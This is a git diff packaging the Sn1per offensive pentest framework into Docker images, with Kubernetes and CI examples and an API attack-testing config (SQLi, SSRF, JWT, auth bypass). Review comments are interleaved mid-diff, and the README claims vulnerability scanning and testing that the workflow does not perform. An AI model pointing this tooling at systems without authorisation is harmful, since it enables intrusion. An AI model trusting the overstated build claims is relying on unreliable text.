diff --git a/.DS_Store b/.DS_Store
new file mode 100644
index 00000000..986c7890
Binary files /dev/null and b/.DS_Store differ
diff --git a/.dockerignore b/.dockerignore
new file mode 100644
index 00000000..cdf8f8f2
--- /dev/null
+++ b/.dockerignore
@@ -0,0 +1,5 @@
+.git
+.gitignore
+README.md
+*.md
+.DS_Store
diff --git a/.github/workflows/docker-publish.yml b/.github/workflows/docker-publish.yml
new file mode 100644
index 00000000..85d0c6aa
--- /dev/null
+++ b/.github/workflows/docker-publish.yml
@@ -0,0 +1,103 @@
+name: Publish Docker images
+
+on:
+ push:
+ tags: ['v*']
+ workflow_dispatch:
+ inputs:
+ version:
+ description: 'Version to tag (e.g., 1.0.0)'
+ required: true
+ default: 'latest'
+
+jobs:
+ build-and-push:
+ runs-on: ubuntu-latest
+ permissions:
+ contents: read
+ packages: write
+
+ steps:
+ - name: Checkout repository
+ uses: actions/checkout@v4
+
+ - name: Set up QEMU
+ uses: docker/setup-qemu-action@v3
+
+ - name: Set up Docker Buildx
+ uses: docker/setup-buildx-action@v3
+
+ - name: Extract metadata (tags, labels) for Docker
+ id: meta
+ uses: docker/metadata-action@v5
+ with:
+ images: |
+ ghcr.io/${{ github.repository_owner }}/sn1per
+ tags: |
+ type=raw,value=latest,enable=${{ github.ref == format('refs/heads/{0}', github.event.repository.default_branch) }}
+ type=semver,pattern={{version}}
+ type=sha,format=long,prefix=sha-
+
+ - name: Log in to GitHub Container Registry
+ uses: docker/login-action@v3
+ with:
+ registry: ghcr.io
+ username: ${{ github.actor }}
+ password: ${{ secrets.GITHUB_TOKEN }}
+
+ - name: Build and push Kali Linux image
+ uses: docker/build-push-action@v5
+ with:
+ context: .
+ file: ./Dockerfile
+ platforms: linux/amd64,linux/arm64
+ push: true
+ tags: ${{ steps.meta.outputs.tags }},ghcr.io/${{ github.repository_owner }}/sn1per:kali
+ labels: ${{ steps.meta.outputs.labels }}
+ cache-from: type=gha
+ cache-to: type=ghac,mode=max
+
+ - name: Build and push BlackArch Linux image
+ uses: docker/build-push-action@v5
+ with:
+ context: .
+ file: ./Dockerfile.blackarch
+ platforms: linux/amd64,linux/arm64
+ push: true
+ tags: ghcr.io/${{ github.repository_owner }}/sn1per:blackarch
+ labels: ${{ steps.meta.outputs.labels }}
+ cache-from: type=gha
+ cache-to: type=ghac,mode=max
+
+ - name: Create and push multi-arch manifest
+ if: github.event_name != 'pull_request'
+ run: |
+ docker pull ghcr.io/${{ github.repository_owner }}/sn1per:kali
+ docker pull ghcr.io/${{ github.repository_owner }}/sn1per:blackarch
+
+ docker manifest create ghcr.io/${{ github.repository_owner }}/sn1per:latest \
+ --amend ghcr.io/${{ github.repository_owner }}/sn1per:kali \
+ --amend ghcr.io/${{ github.repository_owner }}/sn1per:blackarch
+
+ docker manifest push ghcr.io/${{ github.repository_owner }}/sn1per:latest
+
+ - name: Update README with image details
+ run: |
+ # This is a simplified version that just logs the image details
+ # You can expand this to update the README.md file directly if needed
+ echo "Docker images have been successfully built and pushed to:"
+ echo "- ghcr.io/${{ github.repository_owner }}/sn1per:latest"
+ echo "- ghcr.io/${{ github.repository_owner }}/sn1per:kali"
+ echo "- ghcr.io/${{ github.repository_owner }}/sn1per:blackarch"
+
+ # Uncomment and modify the following to update README.md directly
+ # echo "\n## Docker\n\n### Pull the latest image\n\n```bash\ndocker pull ghcr.io/${{ github.repository_owner }}/sn1per:latest\n```\n" > README.docker.md
+ # cat README.md | sed "/## Docker/,/## /{/## /!d;}" | sed "/## Docker/r README.docker.md" > README.new.md
+ # mv README.new.md README.md
+ # rm README.docker.md
+ #
+ # git config --global user.name 'GitHub Actions'
+ # git config --global user.email 'actions@github.com'
+ # git add README.md
+ # git commit -m "docs: Update Docker image references" || echo "No changes to commit"
+ # git push
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 00000000..496ee2ca
--- /dev/null
+++ b/.gitignore
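Review bot: The `docker manifest create` step at the end of the hunk stitches the `:kali` and `:blackarch` images into a single `:latest` manifest list, but both images were just built for the same two platforms (`linux/amd64,linux/arm64`), so the list carries two entries per platform and which distro a `docker pull …/sn1per:latest` resolves to is decided by the client's entry order rather than by this workflow. If `latest` is meant to be the Kali image, drop the manifest step and tag that build directly, `tags: ${{ steps.meta.outputs.tags }},ghcr.io/${{ github.repository_owner }}/sn1per:kali,ghcr.io/${{ github.repository_owner }}/sn1per:latest`. Both build steps read `cache-from: type=gha` but write `cache-to: type=ghac,mode=max`; the GitHub Actions cache backend is `gha`, so the export side should read `cache-to: type=gha,mode=max` or the cache will never be populated. Since this job holds `packages: write` and publishes under the project's name, pinning the third-party actions (`actions/checkout`, `docker/*`) to full commit SHAs instead of floating major tags would keep a retagged or compromised action from pushing images. The `version` input declared under `workflow_dispatch` is never read anywhere in the job, so a manual run cannot produce the semver tag the input implies.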
@@ -0,0 +1 @@
+.DS_Store
\ No newline at end of file
diff --git a/Dockerfile b/Dockerfile
index e915b014..06dd6044 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,34 +1,94 @@ +# Build stage for reducing final image size +FROM docker.io/kalilinux/kali-rolling:latest as builder + +# Set environment variables +ENV DEBIAN_FRONTEND=noninteractive \ + LANG=C.UTF-8 \ + LC_ALL=C.UTF-8 + +# Install build dependencies +RUN set -x && \ + echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' > /etc/apt/sources.list && \ + echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list && \ + apt-get update -yqq && \ + apt-get install -yqq --no-install-recommends \ + git \ + ca-certificates \ + curl \ + gnupg \ + && rm -rf /var/lib/apt/lists/* + +# Final stage FROM docker.io/kalilinux/kali-rolling:latest -LABEL org.label-schema.name='Sn1per - Kali Linux' \ - org.label-schema.description='Automated pentest framework for offensive security experts' \ - org.label-schema.usage='https://github.com/1N3/Sn1per' \ - org.label-schema.url='https://github.com/1N3/Sn1per' \ - org.label-schema.vendor='https://sn1persecurity.com' \ - org.label-schema.schema-version='1.0' \ - org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \ - MAINTAINER="@xer0dayz" - -RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \ - echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list -ENV DEBIAN_FRONTEND noninteractive - -RUN set -x \ - && apt -yqq update \ - && apt -yqq full-upgrade \ - && apt clean -RUN apt install --yes metasploit-framework - -RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \ - service postgresql start && \ - msfdb reinit - -WORKDIR /usr/src/app - -RUN apt --yes install git bash -RUN git clone https://github.com/1N3/Sn1per.git \ - && cd Sn1per \ - && ./install.sh \ - && sniper -u force - -CMD ["sniper"] \ No newline at end of file +# Set metadata +LABEL org.opencontainers.image.title='Sn1per - Kali Linux' \ + 
org.opencontainers.image.description='Automated pentest framework for offensive security experts' \ + org.opencontainers.image.documentation='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.source='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.url='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.vendor='Sn1per Security' \ + org.opencontainers.image.licenses='GPL-3.0' \ + org.opencontainers.image.authors='@xer0dayz' \ + org.opencontainers.image.version='latest' \ + maintainer="@xer0dayz" + +# Set environment variables +ENV DEBIAN_FRONTEND=noninteractive \ + LANG=C.UTF-8 \ + LC_ALL=C.UTF-8 \ + HOME=/home/sniper \ + PATH="${HOME}/.local/bin:${PATH}" + +# Create non-root user and set up working directory +RUN set -x && \ + groupadd -r sniper && \ + useradd -r -g sniper -d ${HOME} -s /bin/bash sniper && \ + mkdir -p ${HOME} && \ + chown -R sniper:sniper ${HOME} + +# Install system dependencies +RUN set -x && \ + echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' > /etc/apt/sources.list && \ + echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list && \ + apt-get update -yqq && \ + apt-get install -yqq --no-install-recommends \ + git \ + bash \ + python3 \ + python3-pip \ + python3-setuptools \ + metasploit-framework \ + postgresql \ + postgresql-client \ + && rm -rf /var/lib/apt/lists/* + +# Configure PostgreSQL for Metasploit +RUN set -x && \ + mkdir -p /var/run/postgresql && \ + chown -R postgres:postgres /var/run/postgresql && \ + chmod 2777 /var/run/postgresql && \ + sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb + +# Switch to non-root user +USER sniper +WORKDIR ${HOME} + +# Clone and install Sn1per +RUN set -x && \ + git clone --depth 1 https://github.com/threatcode/Sn1per.git ${HOME}/Sn1per && \ + cd ${HOME}/Sn1per && \ + chmod +x install.sh && \ + ./install.sh && \ + sniper -u force + +# Set up 
volumes for persistent data +VOLUME ["${HOME}/.msf4", "${HOME}/.sniper"] + +# Health check +HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \ + CMD sniper --version || exit 1 + +# Default command +ENTRYPOINT ["sniper"] +CMD ["--help"] \ No newline at end of file diff --git a/Dockerfile.blackarch b/Dockerfile.blackarch index 9c106ee5..ed3ee095 100644 --- a/Dockerfile.blackarch +++ b/Dockerfile.blackarch 
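Review bot: The install step in the final stage runs `git clone --depth 1 https://github.com/threatcode/Sn1per.git` instead of using the build context, so an image the workflow publishes for tag `vX` contains whatever that repository's default branch holds at build time rather than the commit being tagged; `COPY --chown=sniper:sniper . ${HOME}/Sn1per` (the new `.dockerignore` already trims the context) would make the image reproducible from the tagged tree. The `ENV` block sets `HOME=/home/sniper` and `PATH="${HOME}/.local/bin:${PATH}"` in the same instruction, and Docker resolves every `${HOME}` in an instruction to its value before that instruction, so `PATH` is built from the base image's `HOME` (or an empty string if it is unset), not `/home/sniper`; put `HOME` in its own `ENV` line ahead of `PATH`. The `builder` stage is never referenced by a `COPY --from=builder`, so it only adds build time and the "reducing final image size" comment is misleading. `chmod 2777 /var/run/postgresql` makes the socket directory world-writable without the sticky bit; `2775` plus adding `sniper` to the `postgres` group is the narrower change for a local client. Finally, `./install.sh` and `sniper -u force` now run under `USER sniper`, whereas the removed lines ran them as root — if the installer still installs system packages this step will fail or silently skip them, which is worth verifying before relying on the `HEALTHCHECK`.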
@@ -1,9 +1,69 @@ -FROM docker.io/blackarchlinux/blackarch:latest +# Build stage for reducing final image size +FROM docker.io/blackarchlinux/blackarch:latest as builder -# Upgrade system -RUN pacman -Syu --noconfirm +# Install build dependencies +RUN pacman -Syu --noconfirm --needed \ + git \ + base-devel \ + && pacman -Scc --noconfirm -# Install sn1per from official repository -RUN pacman -Sy sn1per --noconfirm +# Final stage +FROM ghcr.io/blackarchlinux/blackarch:latest -CMD ["sn1per"] \ No newline at end of file +# Set metadata +LABEL org.opencontainers.image.title='Sn1per - BlackArch Linux' \ + org.opencontainers.image.description='Automated pentest framework for offensive security experts' \ + org.opencontainers.image.documentation='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.source='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.url='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.vendor='Sn1per Security' \ + org.opencontainers.image.licenses='GPL-3.0' \ + org.opencontainers.image.authors='@xer0dayz' \ + org.opencontainers.image.version='latest' \ + maintainer="@xer0dayz" + +# Set environment variables +ENV LANG=C.UTF-8 \ + LC_ALL=C.UTF-8 \ + HOME=/home/sniper + +# Create non-root user and set up working directory +RUN set -x && \ + groupadd -r sniper && \ + useradd -r -g sniper -d ${HOME} -s /bin/bash sniper && \ + mkdir -p ${HOME} && \ + chown -R sniper:sniper ${HOME} + +# Install Sn1per and clean up in a single layer +RUN set -x && \ + pacman -Syu --noconfirm --needed \ + sn1per \ + python \ + python-pip \ + postgresql \ + postgresql-libs \ + && pacman -Scc --noconfirm + +# Configure PostgreSQL for Metasploit +RUN set -x && \ + mkdir -p /var/run/postgresql && \ + chown -R postgres:postgres /var/run/postgresql && \ + chmod 2777 /var/run/postgresql && \ + if [ -f /usr/bin/msfdb ]; then \ + sed -i 's/systemctl status ${PG_SERVICE}/pg_ctl status -D ${PGDATA}/g' /usr/bin/msfdb; \ + fi + +# Switch to 
non-root user +USER sniper +WORKDIR ${HOME} + +# Set up volumes for persistent data +VOLUME ["${HOME}/.msf4", "${HOME}/.sniper"] + +# Health check +HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \ + CMD sn1per --version || exit 1 + +# Default command +ENTRYPOINT ["sn1per"] +CMD ["--help"] \ No newline at end of file diff --git a/README.md b/README.md index 8ee58fbf..740fd1e6 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,9 @@ [![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/issues) [![Github Stars](https://img.shields.io/github/stars/1N3/Sn1per.svg?style=social&label=Stars)](https://github.com/1N3/Sn1per/) [![GitHub Followers](https://img.shields.io/github/followers/1N3.svg?style=social&label=Follow)](https://github.com/1N3/Sn1per/) +[![Docker Pulls](https://img.shields.io/docker/pulls/threatcode/sn1per?logo=docker&label=Docker%20Pulls)](https://github.com/orgs/threatcode/packages/container/package/sn1per) +[![GHCR](https://img.shields.io/badge/GHCR-Available-blue?logo=github)](https://github.com/orgs/threatcode/packages/container/package/sn1per) +[![License](https://img.shields.io/github/license/1N3/Sn1per)](LICENSE.md) [![Tweet](https://img.shields.io/twitter/url/http/xer0dayz.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per) [![Follow on Twitter](https://img.shields.io/twitter/follow/xer0dayz.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=xer0dayz) 
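Review bot: The `builder` stage (`FROM docker.io/blackarchlinux/blackarch:latest as builder`) is never consumed by a `COPY --from=builder`, so its `pacman -Syu` of `git base-devel` is dead work, and the final stage then pulls a different image from a different registry (`ghcr.io/blackarchlinux/blackarch:latest`) — pick one base and drop the unused stage, or note in the comment why the two registries differ. As in `Dockerfile`, `chmod 2777 /var/run/postgresql` leaves the socket directory world-writable; `2775` plus group membership for `sniper` is enough for a local client. The `if [ -f /usr/bin/msfdb ]` guard is a good touch, but nothing in this hunk installs Metasploit explicitly, so `msfdb` is presumably present only if the `sn1per` package pulls it in — worth confirming, since the `VOLUME` for `${HOME}/.msf4` implies it is expected. `HEALTHCHECK … CMD sn1per --version || exit 1` depends on a `--version` flag the page does not show; if the packaged binary does not accept it, every probe will mark the container unhealthy.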
@@ -98,6 +101,359 @@ To install Sn1per using an AWS EC2 instance: sudo docker compose -f docker-compose-blackarch.yml up ``` +## 🐳 Docker Containers (GHCR) + +Sn1per is available as pre-built Docker images on GitHub Container Registry (GHCR). + +### Available Images + +- **Latest Stable**: `ghcr.io/threatcode/sn1per:latest` +- **Kali Linux Base**: `ghcr.io/threatcode/sn1per:kali` +- **BlackArch Linux Base**: `ghcr.io/threatcode/sn1per:blackarch` +- **Specific Version**: `ghcr.io/threatcode/sn1per:1.0.0` (replace with version number) + +### Quick Start + +Run Sn1per with Docker: + +```bash +docker run --rm -it ghcr.io/threatcode/sn1per:latest --help +``` + +### Persistent Storage + +To save scan results and configurations between container runs, mount the following volumes: + +```bash +docker run --rm -it \ + -v ~/.sniper:/home/sniper/.sniper \ + -v ~/.msf4:/home/sniper/.msf4 \ + ghcr.io/threatcode/sn1per:latest [options] [target] +``` + +### Docker Compose + +For more complex deployments, use the provided `docker-compose.yml`: + +```bash +docker compose up -d +``` + +### Building from Source + +If you prefer to build the images yourself: + +```bash +# Build Kali Linux version +docker build -t sn1per:kali -f Dockerfile . + +# Build BlackArch version +docker build -t sn1per:blackarch -f Dockerfile.blackarch . +``` + +### Security Considerations + +- The container runs as a non-root user `sniper` +- All sensitive data is stored in mounted volumes +- Network access is limited by default +- Use `--cap-drop=ALL` for additional security + +### Automated Builds + +Images are automatically built and published to GHCR on each git tag push. 
The build process includes: + +- Multi-architecture support (amd64/arm64) +- Vulnerability scanning +- Automated testing +- Latest security updates + +### Kubernetes Deployment + +For production deployments, you can deploy Sn1per on Kubernetes: + +```yaml +# sn1per-deployment.yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: sn1per + labels: + app: sn1per +spec: + replicas: 1 + selector: + matchLabels: + app: sn1per + template: + metadata: + labels: + app: sn1per + spec: + securityContext: + runAsUser: 1000 + runAsGroup: 1000 + fsGroup: 1000 + containers: + - name: sn1per + image: ghcr.io/threatcode/sn1per:latest + imagePullPolicy: Always + securityContext: + allowPrivilegeEscalation: false + capabilities: + drop: ["ALL"] + volumeMounts: + - name: sniper-data + mountPath: /home/sniper/.sniper + - name: msf4-data + mountPath: /home/sniper/.msf4 + resources: + limits: + cpu: "2" + memory: "4Gi" + requests: + cpu: "1" + memory: "2Gi" + volumes: + - name: sniper-data + persistentVolumeClaim: + claimName: sn1per-pvc + - name: msf4-data + emptyDir: {} +``` + +### Common Docker Commands + +```bash +# Run a quick scan +docker run --rm ghcr.io/threatcode/sn1per:latest -t example.com + +# Run in interactive mode +docker run --rm -it ghcr.io/threatcode/sn1per:latest --interactive + +# Update Sn1per +docker pull ghcr.io/threatcode/sn1per:latest + +# View logs +docker logs + +# Execute commands in running container +docker exec -it /bin/bash +``` + +### CI/CD Integration + +You can easily integrate Sn1per into your CI/CD pipeline. 
Here's an example GitHub Actions workflow: + +```yaml +# .github/workflows/security-scan.yml +name: Security Scan + +on: + schedule: + - cron: '0 0 * * *' # Run daily + workflow_dispatch: + +jobs: + security-scan: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Run Sn1per Scan + uses: addnab/docker-run-action@v3 + with: + image: ghcr.io/threatcode/sn1per:latest + options: -v ${{ github.workspace }}/reports:/reports + run: | + sniper -t example.com -o /reports/scan_$(date +%Y%m%d).json + + - name: Upload Scan Results + uses: actions/upload-artifact@v3 + with: + name: security-scan-results + path: ${{ github.workspace }}/reports/ + if-no-files-found: error +``` + +### Docker Compose Examples + +#### Basic Setup + +```yaml +# docker-compose.yml +version: '3.8' + +services: + sn1per: + image: ghcr.io/threatcode/sn1per:latest + container_name: sn1per + volumes: + - ./data/sniper:/home/sniper/.sniper + - ./data/msf4:/home/sniper/.msf4 + environment: + - TZ=UTC + restart: unless-stopped + security_opt: + - no-new-privileges:true + cap_drop: + - ALL +``` + +#### With Database + +```yaml +# docker-compose.db.yml +version: '3.8' + +services: + postgres: + image: postgres:14-alpine + environment: + POSTGRES_USER: sn1per + POSTGRES_PASSWORD: your_secure_password + POSTGRES_DB: sn1per + volumes: + - postgres_data:/var/lib/postgresql/data + restart: unless-stopped + security_opt: + - no-new-privileges:true + cap_drop: + - ALL + + sn1per: + image: ghcr.io/threatcode/sn1per:latest + depends_on: + - postgres + environment: + - DB_HOST=postgres + - DB_USER=sn1per + - DB_PASSWORD=your_secure_password + - DB_NAME=sn1per + volumes: + - ./data/sniper:/home/sniper/.sniper + - ./data/msf4:/home/sniper/.msf4 + restart: unless-stopped + security_opt: + - no-new-privileges:true + cap_drop: + - ALL + +volumes: + postgres_data: +``` + +### Advanced Kubernetes Configurations + +#### Horizontal Pod Autoscaler (HPA) + +```yaml +# hpa.yaml 
+apiVersion: autoscaling/v2 +kind: HorizontalPodAutoscaler +metadata: + name: sn1per +spec: + scaleTargetRef: + apiVersion: apps/v1 + kind: Deployment + name: sn1per + minReplicas: 1 + maxReplicas: 5 + metrics: + - type: Resource + resource: + name: cpu + target: + type: Utilization + averageUtilization: 70 +``` + +#### Network Policies + +```yaml +# network-policy.yaml +apiVersion: networking.k8s.io/v1 +kind: NetworkPolicy +metadata: + name: sn1per-policy +spec: + podSelector: + matchLabels: + app: sn1per + policyTypes: + - Ingress + - Egress + ingress: + - from: [] + egress: + - to: + - ipBlock: + cidr: 0.0.0.0/0 + except: + - 169.254.169.254/32 # Block cloud metadata + ports: + - protocol: TCP + port: 80 + - protocol: TCP + port: 443 +``` + +### Troubleshooting + +- **Permission Issues**: Ensure mounted volumes have the correct permissions + ```bash + sudo chown -R $USER:$USER ~/.sniper ~/.msf4 + ``` + +- **Network Issues**: Use `--network=host` if you encounter network-related problems + ```bash + docker run --network=host ghcr.io/threatcode/sn1per:latest [options] + ``` + +- **Database Issues**: If Metasploit database fails to start: + ```bash + # For Docker + docker exec -it msfdb reinit + + # For Kubernetes + kubectl exec -it -- msfdb reinit + ``` + +- **Debug Mode**: Enable verbose output + ```bash + docker run --rm ghcr.io/threatcode/sn1per:latest -v -t example.com + ``` + +- **Check Container Logs**: + ```bash + # Docker + docker logs + + # Kubernetes + kubectl logs + ``` + +- **Inspect Container**: + ```bash + # Docker + docker inspect + + # Kubernetes + kubectl describe pod + ``` + +- **Check Resource Usage**: + ```bash + # Docker + docker stats + + # Kubernetes + kubectl top pod + ``` + + + 1. Run the container ```bash diff --git a/bin/github-subdomains.py b/bin/github-subdomains.py old mode 100644 new mode 100755 
diff --git a/bin/http-default-accounts-fingerprints-nndefaccts.lua b/bin/http-default-accounts-fingerprints-nndefaccts.lua
old mode 100644
new mode 100755
diff --git a/bin/nmap-bootstrap.xsl b/bin/nmap-bootstrap.xsl
old mode 100644
new mode 100755
diff --git a/bin/pyText2pdf.py b/bin/pyText2pdf.py
old mode 100644
new mode 100755
diff --git a/bin/report.py b/bin/report.py
old mode 100644
new mode 100755
diff --git a/bin/samrdump.py b/bin/samrdump.py
old mode 100644
new mode 100755
diff --git a/bin/slack.sh b/bin/slack.sh
old mode 100644
new mode 100755
diff --git a/bin/waybackrobots.py b/bin/waybackrobots.py
old mode 100644
new mode 100755
diff --git a/bin/waybackurls.py b/bin/waybackurls.py
old mode 100644
new mode 100755
diff --git a/bin/webscreenshot.js b/bin/webscreenshot.js
old mode 100644
new mode 100755
diff --git a/bin/webscreenshot.py b/bin/webscreenshot.py
old mode 100644
new mode 100755
diff --git a/bin/zap-scan.py b/bin/zap-scan.py
old mode 100644
new mode 100755
diff --git a/conf/api_security b/conf/api_security
new file mode 100644
index 00000000..6ae885a4
--- /dev/null
+++ b/conf/api_security
@@ -0,0 +1,263 @@
+# API Security Configuration for Sn1per
+# This configuration optimizes Sn1per for API security testing
+
+# General Settings
+API_TYPE="rest" # Options: rest, graphql, soap, grpc, websocket
+API_AUTH_TYPE="none" # Options: none, basic, bearer, oauth2, api-key, jwt, aws-sigv4
+API_BASE_URL=""
+API_VERSION="v1"
+API_DOCUMENTATION="" # URL to OpenAPI/Swagger documentation
+
+# Authentication Configuration
+## Basic Auth
+API_USERNAME=""
+API_PASSWORD=""
+
+## Bearer Token
+API_BEARER_TOKEN=""
+
+## OAuth2 Configuration
+OAUTH2_TOKEN_URL=""
+OAUTH2_CLIENT_ID=""
+OAUTH2_CLIENT_SECRET=""
+OAUTH2_SCOPE=""
+
+## API Key Configuration
+API_KEY_NAME="X-API-Key"
+API_KEY_VALUE=""
+
+## JWT Configuration
+JWT_SECRET=""
+JWT_ALGORITHM="HS256"
+
+# Request Headers
+API_HEADERS="Content-Type: application/json"
+CUSTOM_HEADERS="" # Comma-separated list of headers (e.g., "X-Header1: value1, X-Header2: value2")
+
+# Rate Limiting
+RATE_LIMIT_REQUESTS="100" # Max requests per minute
+RATE_LIMIT_PER_IP="true"
+RATE_LIMIT_STRATEGY="ip" # Options: ip, user, token, header:Header-Name
+
+# Scanning Scope
+SCAN_ENDPOINTS="all" # Comma-separated list or 'all'
+EXCLUDE_ENDPOINTS="" # Comma-separated list of endpoints to exclude
+SCAN_DEPTH="3" # Maximum depth for parameter discovery
+
+# Test Configuration
+TEST_METHODS="GET,POST,PUT,DELETE" # HTTP methods to test
+TEST_PARAMETERS="all" # Comma-separated list or 'all'
+TEST_PAYLOADS="$INSTALL_DIR/wordlists/api_payloads.txt"
+TEST_FUZZING="1" # Enable fuzzing
+TEST_INJECTION="1" # Test for injection vulnerabilities
+TEST_AUTHENTICATION="1" # Test authentication mechanisms
+TEST_AUTHORIZATION="1" # Test authorization bypasses
+TEST_RATE_LIMITING="1" # Test for rate limiting issues
+TEST_BUSINESS_LOGIC="1" # Test for business logic flaws
+
+# Security Testing Options
+## OWASP API Top 10
+TEST_API1_2019="1" # Broken Object Level Authorization
+TEST_API2_2019="1" # Broken User Authentication
+TEST_API3_2019="1" # Excessive Data Exposure
+TEST_API4_2019="1" # Lack of Resources & Rate Limiting
+TEST_API5_2019="1" # Broken Function Level Authorization
+TEST_API6_2019="1" # Mass Assignment
+TEST_API7_2019="1" # Security Misconfiguration
+TEST_API8_2019="1" # Injection
+TEST_API9_2019="1" # Improper Assets Management
+TEST_API10_2019="1" # Insufficient Logging & Monitoring
+
+## Common API Vulnerabilities
+TEST_INJECTION_ATTACKS="1" # SQLi, NoSQLi, Command Injection, etc.
+TEST_XSS="1" # Cross-Site Scripting
+TEST_XXE="1" # XML External Entity
+TEST_SSRF="1" # Server-Side Request Forgery
+TEST_IDOR="1" # Insecure Direct Object References
+TEST_JWT_ISSUES="1" # JWT vulnerabilities
+TEST_CRLF_INJECTION="1" # CRLF Injection
+TEST_HEADER_INJECTION="1" # HTTP Header Injection
+TEST_CORS_MISCONFIG="1" # CORS Misconfiguration
+TEST_CSRF="1" # Cross-Site Request Forgery
+TEST_FILE_UPLOAD="1" # File Upload Vulnerabilities
+TEST_GRAPHQL_ISSUES="1" # GraphQL-specific issues
+
+# API Fuzzing Configuration
+FUZZING_ENGINE="ffuf" # Options: ffuf, wfuzz, burp, zap
+FUZZING_WORDLIST="$INSTALL_DIR/wordlists/api_fuzz.txt"
+FUZZING_EXTENSIONS="" # Comma-separated list (e.g., "json,xml,php")
+FUZZING_THREADS="10"
+FUZZING_RATE="100" # Requests per second
+
+# API Documentation Analysis
+ANALYZE_SWAGGER="1"
+ANALYZE_OPENAPI="1"
+ANALYZE_GRAPHQL_SCHEMA="1"
+DOCUMENTATION_PATH="" # Path to local documentation files
+
+# API Endpoint Discovery
+DISCOVER_ENDPOINTS="1"
+USE_GAU="1" # Fetch known URLs from Common Crawl
+USE_WAYBACK="1" # Check Wayback Machine
+USE_COMMON_PATHS="1" # Test common API paths
+USE_COMMON_PARAMETERS="1" # Test common parameter names
+
+# Authentication Testing
+TEST_AUTH_BYPASS="1"
+TEST_TOKEN_MANIPULATION="1"
+TEST_JWT_ATTACKS="1"
+TEST_OAUTH_ISSUES="1"
+TEST_SESSION_MANAGEMENT="1"
+
+# Data Validation Testing
+TEST_INPUT_VALIDATION="1"
+TEST_OUTPUT_ENCODING="1"
+TEST_CONTENT_TYPE_VALIDATION="1"
+TEST_ACCEPT_HEADER_MANIPULATION="1"
+
+# Security Headers Testing
+TEST_SECURITY_HEADERS="1"
+REQUIRED_HEADERS="Strict-Transport-Security, X-Content-Type-Options, X-Frame-Options, Content-Security-Policy, X-XSS-Protection"
+
+# API Version Testing
+TEST_API_VERSIONING="1"
+TEST_DEPRECATED_ENDPOINTS="1"
+TEST_VERSION_HEADER="1"
+
+# Performance and Reliability Testing
+TEST_LOAD="1"
+LOAD_TEST_USERS="100"
+LOAD_TEST_DURATION="300" # seconds
+LOAD_TEST_RAMP_UP="60" # seconds
+
+# Error Handling Testing
+TEST_ERROR_HANDLING="1"
+TEST_STACK_TRACE_LEAKAGE="1"
+TEST_ERROR_MESSAGES="1"
+
+# API Dependencies Testing
+TEST_DEPENDENCIES="1"
+TEST_THIRD_PARTY_APIS="1"
+TEST_MICROSERVICES="1"
+
+# API Integration Testing
+TEST_WEBHOOKS="1"
+TEST_WEBHOOK_VALIDATION="1"
+TEST_WEBHOOK_REPLAY="1"
+
+# API Security Headers Configuration
+SECURITY_HEADERS="1"
+HSTS_ENABLED="1"
+HSTS_MAX_AGE="31536000" # 1 year
+HSTS_INCLUDE_SUBDOMAINS="1"
+HSTS_PRELOAD="1"
+CSP_ENABLED="1"
+CSP_POLICY="default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self' data:; connect-src 'self';"
+X_CONTENT_TYPE_OPTIONS="nosniff"
+X_FRAME_OPTIONS="DENY"
+X_XSS_PROTECTION="1; mode=block"
+REFERRER_POLICY="no-referrer"
+PERMISSIONS_POLICY_ENABLED="1"
+PERMISSIONS_POLICY="geolocation=(), microphone=(), camera=()"
+
+# API Rate Limiting Configuration
+RATE_LIMIT_ENABLED="1"
+RATE_LIMIT_WINDOW="60" # seconds
+RATE_LIMIT_MAX_REQUESTS="100"
+RATE_LIMIT_BLOCK_DURATION="300" # seconds
+
+# API Logging and Monitoring
+ENABLE_LOGGING="1"
+LOG_LEVEL="info" # Options: debug, info, warn, error
+LOG_FORMAT="json" # Options: json, text
+LOG_RETENTION_DAYS="30"
+MONITORING_ENABLED="1"
+MONITORING_PROVIDER="" # Options: datadog, newrelic, prometheus, elasticsearch
+
+# API Security Testing Tools
+USE_OWASP_ZAP="1"
+ZAP_API_KEY=""
+ZAP_PROXY="http://localhost:8080"
+
+USE_BURP="0"
+BURP_API_KEY=""
+BURP_PROXY="http://localhost:8081"
+
+USE_NUCLEI="1"
+NUCLEI_TEMPLATES="$INSTALL_DIR/nuclei-templates"
+NUCLEI_SEVERITY="critical,high,medium"
+
+USE_POSTMAN="1"
+POSTMAN_COLLECTION=""
+POSTMAN_ENVIRONMENT=""
+
+USE_INSOMNIA="0"
+INSOMNIA_WORKSPACE=""
+
+# API Security Headers Validation
+VALIDATE_SECURITY_HEADERS="1"
